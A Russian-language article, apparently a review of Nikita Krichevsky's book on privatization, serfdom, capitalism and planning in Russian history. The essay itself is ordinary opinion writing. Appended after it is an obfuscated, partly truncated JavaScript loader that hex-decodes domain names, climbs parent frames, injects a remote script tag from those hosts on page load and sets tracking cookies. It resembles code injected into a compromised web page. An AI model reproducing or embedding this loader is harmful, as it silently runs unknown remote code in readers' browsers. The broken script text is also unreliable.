Приватизации, капитализм и социализм

Приватизации, капитализм и социализм
Приватизации, капитализм и социализм

В российской истории всё уже было — и приватизация, и планирование, и капитализм, утверждает в своей книге «Наследие противоречий» известный экономист Никита Кричевский. Ответы на все вопросы он предлагает искать в нашем прошлом.

Людям свойственно пренебрегать уроками истории — и россияне здесь не исключение. Иногда это приводит к трагическим последствиям. Но мы упрямо обращаемся за уроками то на запад, то на юг, то на восток, то ещё куда-то. Все последние 25 лет мы изучали всё, что угодно, только не нас самих, не нашу историю. И повторяли сказки об извечном русском рабстве и фатальном отличии России от Европы.

Между тем отличий от того же историко-культурного Запада у нас не так много. Главное — в том, что если на Западе капитализм был городским, то в России — сельским. У нас развивались сельские мануфактуры. Причём многие мануфактуры возникали там и тогда, когда до отмены крепостного права оставались ещё столетия.

Пётр I приписывал крепостных к мануфактурам тысячами. Многие крупнейшие предприниматели страны XIX века изначально были крепостными. Разбогатев, они выкупали себя и свои семьи за огромные деньги, но до этого существовали достаточно комфортно в условиях формальных и неформальных договорённостей со своими хозяевами.

Первая русская приватизация произошла в 1762 году по «Указу о вольности дворянской», когда Пётр III освободил дворян от государственной службы. И этот 1% населения принял возможность владеть землёй и крепостными людьми по праву рождения, без каких-либо обязанностей, с благодарностью. Но 99% не поняли, почему они должны остаться «за бортом» этой приватизации. И вдобавок оставаться крепостными тех, кто уже государю не служит.

Отмена крепостного права была такой же приватизацией, только грабительской. Люди говорили: «Вы нас освобождаете, но требуете огромных выплат за землю, к которой мы были прикреплены, да ещё в течение 50 лет. Где же здесь справедливость?»

«Рвануло» в 1917-м, через 150 лет. Почему произошла Октябрьская революция? Причин у неё, конечно, много — дело и в особенностях русского капитализма, и в том глубочайшем мировоззренческом расколе, который произошёл в России в 1653 году. Но также и в той самой недостойной приватизации, проведённой при отмене крепостного права.

Поэтому приватизация, которая была 20–25 лет назад, — отнюдь не «закрытая страница истории» нашей страны. Мы можем думать, что она была давно и те, кто что-то «прихватизировал», уже себя обезопасили, но это не так. Показательно, что сегодня мы радуемся, когда олигархи друг другу глотки перегрызают. И происходит это именно потому, что случившееся 25 лет назад не даёт нам возможности относиться к этим людям хоть с какой-то долей уважения.

Но дело не только в том, что собственность была «прихватизирована» нечестно, дело и в отношении к собственности на некоторые предметы, которое у нас отличается и от Запада, и от Востока.

Крестьяне, которых ловили при рубке помещичьего леса, не считали себя ворами: «Лес — он не барский, а Божий. Барин его не растил!» Чья нефть? Божья. Чей газ? Божий.

Поэтому, прежде чем говорить о том, что делать, надо понять, что было. Например,

 
то, что централизация и связанное с ней планирование были присущи России на протяжении минимум нескольких предшествующих столетий, и привело это к той относительной лёгкости, с которой плановая, позднее переродившаяся в директивную, социалистическая система хозяйствования вошла в российскую жизнь. Наследие проявлялось даже в деталях: «ленинский» план ГОЭЛРО, по одной версии, был стратегией, разработанной немецкими инженерами перед Первой мировой войной для Петербургской электрической компании, по другой — наработками созданной в 1916 году академической комиссии по изучению естественных производительных сил России, реанимированными советским правительством.

Возможно ли восстановление планово-индикативных начал в современной российской экономике? Без сомнения, да. Это, как и многие другие черты нашего менталитета, дополненные достижениями современной экономической теории, поможет нам выйти на траекторию устойчивого развития.

 

<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>